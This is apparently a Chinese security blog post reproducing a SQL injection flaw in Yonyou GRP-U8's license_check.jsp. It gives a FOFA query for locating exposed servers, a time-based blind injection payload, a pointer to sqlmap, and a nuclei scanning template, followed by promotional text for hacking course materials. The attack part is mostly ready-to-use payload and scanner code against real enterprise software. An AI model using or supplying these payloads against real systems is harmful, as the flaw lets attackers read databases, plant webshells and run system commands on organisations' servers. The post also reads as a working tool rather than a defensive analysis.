用友 GRP-U8 存在sql注入漏洞复现

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa：app=”用友-GRP-U8”

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令：nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -u Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

id: u8grp_license_check
info:
name: 用友GRP-U8 License Check漏洞
author: YourName
severity: high

requests:
- method: GET
path:
- "{{BaseURL}}/u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'--"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "1")'
condition: and

还没看够？可以关注~

免费领取安全学习资料包！（私聊进群一起学习，共同进步）

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

 

应急响应笔记

学习路线